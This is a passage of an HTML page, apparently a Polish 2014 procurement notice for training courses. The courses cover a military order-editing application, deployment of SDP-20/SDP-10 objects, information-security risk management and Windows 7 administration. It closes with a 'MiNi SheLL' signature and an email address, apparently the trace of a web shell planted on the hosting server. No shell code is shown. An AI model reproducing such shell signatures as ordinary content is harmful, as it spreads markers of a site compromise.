a)edytowanie i dystrybucja dokumentów: SSTO, SSREP, MWO, MEO, CMO, COVREP, MCR;
b)generowanie rozkazów MWO/MEO na podstawie zaplanowanego wariantu rozmieszczenia jednostek;
c)generowanie meldunków o pokryciu przydzielonej strefy CovRep.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 08.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Szkolenia w zakresie obsługi 
i użytkowania aplikacji Edytor Dokumentów Sformalizowanych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zagadnienia obowiązkowo objęte szkoleniem:
1)BLOK I - Szkolenie ogólne - zapoznawcze:
a)uruchomienie aplikacji,
b)ogólne zasady wprowadzania dokumentu w formacie liniowym (formatki),
c)skróty klawiszowe,
d)otwieranie nowego dokumentu w formacie MTF,
e)otwieranie nowego dokumentu w formacie liniowym,
f)zapisywanie dokumentu w BST,
g)zapisywanie dokumentu na nośniku zewnętrznym,
h)wysyłanie dokumentu pocztą elektroniczną,
i)drukowanie dokumentu,
j)zamykanie aplikacji,
k)wyświetlanie zawartości dokumentu z BST,
l)usuwanie dokumentu,
m)edytowanie dokumentu jako nowego,
n)poprawianie dokumentu,
o)wybór widoku dokumentu (format liniowy lub MTF).
2)BLOK II - Konfigurowanie dokumentów rozkazodawczych:
a)dokument SSTO,
b)dokument SSREP,
c)dokumenty MWO, MEO, MCR, COVREP, MOVREQ,
d)okno dialogowe tworzenia i wysyłania rozkazów MWO (operacja ćwiczebna),
e)okno dialogowe tworzenia i wysyłania rozkazów MWO (operacja bojowa),
f)okno dialogowe tworzenia i wysyłania rozkazów MEO (operacja ćwiczebna),
g)okno dialogowe tworzenia i wysyłania rozkazów MEO (operacja bojowa),
h)okno dialogowe tworzenia i wysyłania meldunku COVREP ugrupowania,
i)nagłówek meldunku COVREP ugrupowania dla operacji ćwiczebnej.
3)BLOK  III - Komunikaty podczas wykonywania poleceń/edytor operacji: 
a)wprowadzany dokument nie jest poprawny,
b)dokument został już zapisany w BST,
c)wskazany plik już istnieje,
d)wydruk dokumentu nie powiódł się,
e)operacja bezpowrotnie usunie wybrany dokument z bazy,
f)zmiany nie zostały zachowane,
g)kontynuować zamknięcie aplikacji?,
h)pasek dodatkowych informacji,
i)sygnalizacja nadejścia wiadomości,
j)pole statusu aplikacji,
k)data i czas UTC,
l)obszar roboczy,
m)wpisanie treści nowego dokumentu w formacie MTF,
n)wpisanie treści nowego dokumentu w formacie liniowym,
o)wczytanie treści dokumentu z nośnika zewnętrznego,
p)wyświetlenie treści dokumentu znajdującego się w BST,
q)usunięcie dokumentu znajdującego się w BST,
r)edycja dokumentu znajdującego się w BST,
s)zapisanie dokumentu znajdującego się w BST na nośniku,
t)wysłanie dokumentu znajdującego się w BST pocztą elektroniczną,
u)wydruk dokumentu znajdującego się w BST,
v)lokalizowanie błędów w niepoprawnych dokumentach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Szkolenia w zakresie transportowania
 i zmiany położenia z bojowego w marszowe (i odwrotnie) obiektów SDP-20 i SDP-10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zagadnienia obowiązkowo objęte szkoleniem:
1)Zasady BHP,
2)Budowa i parametry techniczne obiektów SDP-20 i SDP-10,
3)Wybór miejsca rozwinięcia obiektu,
4)Rozmieszczenie elementów obiektu na pozycji,
5)Zmiana położenia z marszowego w bojowe,
6)Sprzęganie obiektu z elementami współpracującymi (nadrzędnym, kabinami KDN, stacją r-lok, aparatownią łączności),
7)Zmiana położenia z bojowego w marszowe,
8)Załadunek (rozładunek) kabin na samochody,
9)Transport kołowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Szkolenia w zakresie zarządzania ryzykiem w bezpieczeństwie informacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zagadnienia obowiązkowo objęte szkoleniem:
1)Znaczenie zarządzania ryzykiem w Systemie Zarządzania Bezpieczeństwem Informacji:
a)zarządzanie ryzykiem w Systemie Zarządzania Bezpieczeństwem Informacji,
b)omówienie procesu zarządzania ryzykiem w bezpieczeństwie informacji.
2)Szacowanie ryzyka w bezpieczeństwie informacji:
a)metody szacowania ryzyka,
b)czynniki wpływające na wybór metody,
c)metody postępowania z ryzykiem,
d)ograniczenia w redukcji ryzyka.
3)Praktyczne ćwiczenie zaprezentowanych technik, ułatwiające zastosowanie wiedzy w codziennej działalności uczestników szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Szkolenia w zakresie administracji, konfiguracji zabezpieczeń oraz utrzymania systemu Windows 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 6Zagadnienia obowiązkowo objęte szkoleniem:
1)Instalacja Windows 7
a)nowa instalacja Windows 7
b)aktualizacja do Windows 7
c)proces startu Windows 7
2)Konfiguracja i zarządzanie ustawieniami Windows 7
a)właściwości systemu
b)panel sterowania Windows 7
c)zarządzanie kontami i profilami użytkowników
d)konsola zarządzania komputerem
3)Dostosowanie interfejsu użytkownika Windows 7
a)nowy model sterownika wyświetlania Windows
b)ustawienia Menu Start oraz paska zadań
c)dostosowywanie pulpitu
4)Windows 7 w środowisku grupy roboczej
a)grupa robocza a domena Active Directory
b)dodawanie Windows 7 do grupy roboczej
c)konfiguracja HomeGroup w Windows 7
d)biblioteki w Windows 7
e)udostępnianie zasobów
5)Integracja Windows 7 z Active Directory
a)omówienie DNS
b)Windows Server 2008 R2 Active Directory
c)dodawanie do domeny Active Directory
d)wykorzystanie narzędzi zdalnych Active Directory
e)implementacja Group Policy
6)Sieci w Windows 7
a)wprowadzenie TCP/IP
b)następna generacja stosu TCP/IP
c)protokół DHCP
7)Dostęp zdalny i komputery mobilne
a)pulpit zdalny
b)opcje zarządzania energią
c)pliki i foldery trybu offline
8)Praca z systemami plików
a)zarządzanie dyskiem i partycjami
b)montowanie plików VHD
c)funkcje NTFS 6.x
d)zabezpieczenia systemu plików
e)wykorzystanie EFS do ochrony plików
9)Zabezpieczanie Windows 7
a)ustawienia User Account Control
b)konfiguracja zapory ogniowej w Windows 7
c)Microsoft Security Essentials
d)Windows Update
e)wykorzystanie BitLocker do ochrony dysku
f)implementacja Network Access Protection
10)Kopie zapasowe i ich odtwarzanie
a)ochrona Windows 7
b)przywracanie poprzednich wersji plików
c)kopie zapasowe i ich odtwarzanie
d)obraz systemu Windows 7
e)tworzenie dysku naprawczego
f)tworzenie niestandardowego dysku WinRE
11)Rozwiązywanie problemów z Windows 7
a)analiza wydajności systemu
b)narzędzia monitorowania
c)narzędzia do rozwiązywania problemów
d)optymalizacja wydajności Windows 7
12)Uruchamianie i rozwiązywanie problemów z aplikacjami w Windows 7
a)narzędzia rozwiązywania problemów
b)wirtualizacja rejestru i plików Windows 7
c)Microsoft Virtual PC i tryb XP Mode.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com